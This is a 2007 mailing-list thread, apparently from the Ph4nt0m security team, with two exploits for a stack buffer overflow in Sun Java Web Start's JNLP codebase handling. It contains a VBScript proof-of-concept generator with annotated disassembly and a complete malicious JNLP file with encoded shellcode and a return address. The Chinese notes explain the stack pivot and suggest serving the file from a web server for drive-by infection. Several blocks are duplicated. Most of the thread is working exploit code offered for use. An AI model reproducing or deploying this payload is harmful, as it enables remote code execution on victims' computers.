[Ph4nt0m Security Team] [Exploit]Sun Java WebStart JNLP Stack Buffer Overflow...
0 views
Skip to first unread message
* Ph4nt0m Security Team *
Jul 10, 2007, 10:54:57 AM7/10/07
to ph4...@googlegroups.com
'-----------------------------------------------------------------------------------------------
' Java Web Start Buffer Overflow POC Exploit
'
' FileName: JavaWebStartPOC.VBS
' Contact: ZhenHan.Liu#ph4nt0m.org
' Date: 2007-07-10
' Team: http://www.ph4nt0m.org
' Enviroment: Tested on JRE 1.6, javaws.exe v6.0.10.6
' Reference: http://seclists.org/fulldisclosure/2007/Jul/0155.html
' Usage: I did not put a real alpha shellcode here, you'd replace it with your own.
'
' Code(javaws.exe):
' .text:00406208 ; *************** S U B R O U T I N E ***************************************
' .text:00406208
' .text:00406208 ; Attributes: bp-based frame
' .text:00406208
' .text:00406208 sub_406208 proc near ; CODE XREF: sub_405468+4E p
' .text:00406208
' .text:00406208 FileName = byte ptr -540h
' .text:00406208 FindFileData = _WIN32_FIND_DATAA ptr -140h
' .text:00406208 arg_0 = dword ptr 8
' .text:00406208 arg_4 = dword ptr 0Ch
' .text:00406208
' .text:00406208 push ebp ; FileName 1k Buffer
' .text:00406209 mov ebp, esp
' .text:0040620B sub esp, 540h
' .text:00406211 push 5Fh
' .text:00406213 push 2Fh
' .text:00406215 push [ebp+arg_0]
' .text:00406218 call sub_40544D
' .text:00406218
' .text:0040621D push 5Fh
' .text:0040621F push 3Ah
' .text:00406221 push [ebp+arg_0]
' .text:00406224 call sub_40544D
' .text:00406224
' .text:00406229 add esp, 18h
' .text:0040622C push 2Ah
' .text:0040622E push [ebp+arg_0] ; codebase buffer
' .text:00406231 push 5Ch
' .text:00406233 push offset s_Si ; "si"
' .text:00406238 push 5Ch
' .text:0040623A push offset s_Tmp_0 ; "tmp"
' .text:0040623F push 5Ch
' .text:00406241 call sub_40615B
' .text:00406241
' .text:00406246 push eax
' .text:00406247 lea eax, [ebp+FileName]
' .text:0040624D push offset s_SCSCSCSC ; "%s%c%s%c%s%c%s%c"
' .text:00406252 push eax ; char *
' .text:00406253 call _sprintf ; sprintf copy codebase to 1k stack buffer lead to buffer over flow
' .text:00406253
' .text:00406258 add esp, 28h
' .text:0040625B lea eax, [ebp+FindFileData]
' .text:00406261 push eax ; lpFindFileData
' .text:00406262 lea eax, [ebp+FileName]
' .text:00406268 push eax ; lpFileName
' .text:00406269 call ds:FindFirstFileA
' .text:0040626F cmp eax, 0FFFFFFFFh
' .text:00406272 jnz short loc_406278
' .text:00406272
' .text:00406274 xor eax, eax
' .text:00406276 leave
' .text:00406277 retn
' .text:00406277
' .text:00406278 ; ---------------------------------------------------------------------------
' .text:00406278
' .text:00406278 loc_406278: ; CODE XREF: sub_406208+6A j
' .text:00406278 push esi
' .text:00406279 mov esi, [ebp+arg_4]
' .text:0040627C lea ecx, [ebp+FindFileData' .cFileName]
' .text:00406282 mov edx, ecx
' .text:00406284 sub esi, edx
' .text:00406284
' .text:00406286
' .text:00406286 loc_406286: ; CODE XREF: sub_406208+86 j
' .text:00406286 mov dl, [ecx]
' .text:00406288 mov [esi+ecx], dl
' .text:0040628B inc ecx
' .text:0040628C test dl, dl
' .text:0040628E jnz short loc_406286
' .text:0040628E
' .text:00406290 push eax ; hFindFile
' .text:00406291 call ds:FindClose
' .text:00406297 xor eax, eax
' .text:00406299 inc eax
' .text:0040629A pop esi
' .text:0040629B leave
' .text:0040629C retn
' .text:0040629C
' .text:0040629C sub_406208 endp
'-----------------------------------------------------------------------------------------------
If WScript.Arguments.Count <> 1 Then
WScript.Echo WScript.ScriptName & " <FileName>"
WScript.Quit
End If
sFileName = WScript.Arguments(0)
On Error Resume Next
Set oFSO = WScript.CreateObject("Scripting.FileSystemObject")
Set oFS = oFSO.CreateTextFile(sFileName)
If Err.Number <> 0 Then
WScript.Echo "Error: Failed Create File."
WScript.Quit
End If
c = Chr(&H04)
alphaShellcode = "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII"
oFS.WriteLine "<?xml version=""1.0"" encoding=""utf-8""?>"
oFS.WriteLine "<jnlp spec=""1.0+"" codebase=""http://" & String(12000000, c) & alphaShellcode & String(24, c) & """ href=""test.jnlp"">"
oFS.WriteLine "</jnlp>"
If Err.Number <> 0 Then
WScript.Echo "Error: Failed Write File."
Err.Clear
End If
oFS.Close
Set oFS = Nothing
Set oFSO = Nothing
' Java Web Start Buffer Overflow POC Exploit
'
' FileName: JavaWebStartPOC.VBS
' Contact: ZhenHan.Liu#ph4nt0m.org
' Date: 2007-07-10
' Team: http://www.ph4nt0m.org
' Enviroment: Tested on JRE 1.6, javaws.exe v6.0.10.6
' Reference: http://seclists.org/fulldisclosure/2007/Jul/0155.html
' Usage: I did not put a real alpha shellcode here, you'd replace it with your own.
'
' Code(javaws.exe):
' .text:00406208 ; *************** S U B R O U T I N E ***************************************
' .text:00406208
' .text:00406208 ; Attributes: bp-based frame
' .text:00406208
' .text:00406208 sub_406208 proc near ; CODE XREF: sub_405468+4E p
' .text:00406208
' .text:00406208 FileName = byte ptr -540h
' .text:00406208 FindFileData = _WIN32_FIND_DATAA ptr -140h
' .text:00406208 arg_0 = dword ptr 8
' .text:00406208 arg_4 = dword ptr 0Ch
' .text:00406208
' .text:00406208 push ebp ; FileName 1k Buffer
' .text:00406209 mov ebp, esp
' .text:0040620B sub esp, 540h
' .text:00406211 push 5Fh
' .text:00406213 push 2Fh
' .text:00406215 push [ebp+arg_0]
' .text:00406218 call sub_40544D
' .text:00406218
' .text:0040621D push 5Fh
' .text:0040621F push 3Ah
' .text:00406221 push [ebp+arg_0]
' .text:00406224 call sub_40544D
' .text:00406224
' .text:00406229 add esp, 18h
' .text:0040622C push 2Ah
' .text:0040622E push [ebp+arg_0] ; codebase buffer
' .text:00406231 push 5Ch
' .text:00406233 push offset s_Si ; "si"
' .text:00406238 push 5Ch
' .text:0040623A push offset s_Tmp_0 ; "tmp"
' .text:0040623F push 5Ch
' .text:00406241 call sub_40615B
' .text:00406241
' .text:00406246 push eax
' .text:00406247 lea eax, [ebp+FileName]
' .text:0040624D push offset s_SCSCSCSC ; "%s%c%s%c%s%c%s%c"
' .text:00406252 push eax ; char *
' .text:00406253 call _sprintf ; sprintf copy codebase to 1k stack buffer lead to buffer over flow
' .text:00406253
' .text:00406258 add esp, 28h
' .text:0040625B lea eax, [ebp+FindFileData]
' .text:00406261 push eax ; lpFindFileData
' .text:00406262 lea eax, [ebp+FileName]
' .text:00406268 push eax ; lpFileName
' .text:00406269 call ds:FindFirstFileA
' .text:0040626F cmp eax, 0FFFFFFFFh
' .text:00406272 jnz short loc_406278
' .text:00406272
' .text:00406274 xor eax, eax
' .text:00406276 leave
' .text:00406277 retn
' .text:00406277
' .text:00406278 ; ---------------------------------------------------------------------------
' .text:00406278
' .text:00406278 loc_406278: ; CODE XREF: sub_406208+6A j
' .text:00406278 push esi
' .text:00406279 mov esi, [ebp+arg_4]
' .text:0040627C lea ecx, [ebp+FindFileData' .cFileName]
' .text:00406282 mov edx, ecx
' .text:00406284 sub esi, edx
' .text:00406284
' .text:00406286
' .text:00406286 loc_406286: ; CODE XREF: sub_406208+86 j
' .text:00406286 mov dl, [ecx]
' .text:00406288 mov [esi+ecx], dl
' .text:0040628B inc ecx
' .text:0040628C test dl, dl
' .text:0040628E jnz short loc_406286
' .text:0040628E
' .text:00406290 push eax ; hFindFile
' .text:00406291 call ds:FindClose
' .text:00406297 xor eax, eax
' .text:00406299 inc eax
' .text:0040629A pop esi
' .text:0040629B leave
' .text:0040629C retn
' .text:0040629C
' .text:0040629C sub_406208 endp
'-----------------------------------------------------------------------------------------------
If WScript.Arguments.Count <> 1 Then
WScript.Echo WScript.ScriptName & " <FileName>"
WScript.Quit
End If
sFileName = WScript.Arguments(0)
On Error Resume Next
Set oFSO = WScript.CreateObject("Scripting.FileSystemObject")
Set oFS = oFSO.CreateTextFile(sFileName)
If Err.Number <> 0 Then
WScript.Echo "Error: Failed Create File."
WScript.Quit
End If
c = Chr(&H04)
alphaShellcode = "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII"
oFS.WriteLine "<?xml version=""1.0"" encoding=""utf-8""?>"
oFS.WriteLine "<jnlp spec=""1.0+"" codebase=""http://" & String(12000000, c) & alphaShellcode & String(24, c) & """ href=""test.jnlp"">"
oFS.WriteLine "</jnlp>"
If Err.Number <> 0 Then
WScript.Echo "Error: Failed Write File."
Err.Clear
End If
oFS.Close
Set oFS = Nothing
Set oFSO = Nothing
--
由 * Ph4nt0m Security Team * 于 7/10/2007 07:51:00 上午 在 Ph4nt0m Security Team 上发表
* Ph4nt0m Security Team *
Jul 11, 2007, 9:47:35 PM7/11/07
to ph4...@googlegroups.com
by axis
2007-07-11
http://www.ph4nt0m.org
最终我还是决定把这个鸡肋的exp放出来。
废话不多说了,exp如下:
其中覆盖字符串的最后 &0v 是16进制的 0x76302619, 这个地址是 pop/pop/pop/retn
因为字符范围要是在 0x01--0x7f ,所以找这个opcode很费了我点心思。
我测试的版本是 jre 1.5.0_11 , 简体中文 xp sp2
在我的环境中, 在[esp+10h]处有一个指向payload中一段的拷贝,所以我先跳过去,然后执行第一段shellcode
mov edx, esp
sub esp, 4fbh
jmp esp
因为edx也指向栈内,所以精确计算后,就把esp指向了第二段shellcode,然后就可以执行真正的shellcode了。
不过这个方法好像只对我的版本有效,luoluo的jre是1.6的,栈内就少了很多指向shellcode的指针了。
还可以考虑覆盖seh,可能会通用点,没继续跟了,有兴趣的不妨自己改改。
这个漏洞是属于文件型的,可以ie下载后执行。如果配置了webserver,应该可以起到挂马的作用,而且不挂ie。 但是这个漏洞是和当前登录的用户名长度有关的,所以可能要同时放置许多不同长度payload的文件到某目录下,虽然这样可能会造成出错,但是ie是不受影响的。
最后在调试shellcode的时候一定要多加注意。
--
由 * Ph4nt0m Security Team * 于 7/11/2007 06:23:00 下午 在 Ph4nt0m Security Team 上发表
2007-07-11
http://www.ph4nt0m.org
最终我还是决定把这个鸡肋的exp放出来。
废话不多说了,exp如下:
<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0+" codebase="http://TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIil3ZJKpMKXyiKOYo9o1plKPlWT14LKw5gLLK3LUU48UQjOlKbodXLKSoupuQZKrilK4tNkeQZN01yPlYnLMTO0QdwwiQxJFmVaxBXkZTWKpTvDWXqeYuLKaO6DUQzKpflKTLpKLKQOWlC1ZKgsfLLKLIbLwT5LSQjcdqkksTLKw3vPNkSpVlLK2PuLnMLKW0c8aNU8LNPNVnJLpPyozvPf2srF3XWCFRaxQgps7B1OPTkOzpphJkZMKLwKPPkOKfQOMYm556mQZMtHuRpURJURYoxPQxkiuYyelmqGYoxVf3Rs3cf3CcG3BspCscKOjpav3X5TorqvpSoyxaLUU8nDTZ2PO7v7KOHVazdPPQaE9oHPqxOTnMdn9y0WYoZvPSSeyoN058KUg9K6QYV7KOzvV0RtbtRuYoJpLSU8kWcIO6QisgYokfpU9ohPpfQzRDbFPh53PmmYKU1zf0pYq9xLOyHgRJQTniYrtqYPxsNJKN72TmynpBvLZ3LMpzVXNKNKLkcXsBInlsUFKOBUBdkO8VCk2w2rpQv1casZuQv1CaPUf1YoZpE8LmXY7uxNPSyoJv0jkOYo5gioJpLKRwYlk3KtQt9oXVQBkON0sXxojnYpe0rsKON6KOZpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALLLLYIIIIIIIIIIIIIIIQZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJINkJtMQZLkK34UPuPkOJDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA &0v" >
<information>
<title>Test Swing Java Web Start</title>
<vendor>Pan Daoen</vendor>
<description>Swing Application</description>
<offline-allowed/>
</information>
<resources>
<j2se version="1.5+"/>
<jar href=""/>
</resources>
<application-desc/>
</jnlp>
<information>
<title>Test Swing Java Web Start</title>
<vendor>Pan Daoen</vendor>
<description>Swing Application</description>
<offline-allowed/>
</information>
<resources>
<j2se version="1.5+"/>
<jar href=""/>
</resources>
<application-desc/>
</jnlp>
其中覆盖字符串的最后 &0v 是16进制的 0x76302619, 这个地址是 pop/pop/pop/retn
因为字符范围要是在 0x01--0x7f ,所以找这个opcode很费了我点心思。
我测试的版本是 jre 1.5.0_11 , 简体中文 xp sp2
在我的环境中, 在[esp+10h]处有一个指向payload中一段的拷贝,所以我先跳过去,然后执行第一段shellcode
mov edx, esp
sub esp, 4fbh
jmp esp
因为edx也指向栈内,所以精确计算后,就把esp指向了第二段shellcode,然后就可以执行真正的shellcode了。
不过这个方法好像只对我的版本有效,luoluo的jre是1.6的,栈内就少了很多指向shellcode的指针了。
还可以考虑覆盖seh,可能会通用点,没继续跟了,有兴趣的不妨自己改改。
这个漏洞是属于文件型的,可以ie下载后执行。如果配置了webserver,应该可以起到挂马的作用,而且不挂ie。 但是这个漏洞是和当前登录的用户名长度有关的,所以可能要同时放置许多不同长度payload的文件到某目录下,虽然这样可能会造成出错,但是ie是不受影响的。
最后在调试shellcode的时候一定要多加注意。
--
由 * Ph4nt0m Security Team * 于 7/11/2007 06:23:00 下午 在 Ph4nt0m Security Team 上发表
Reply all
Reply to author
Forward
0 new messages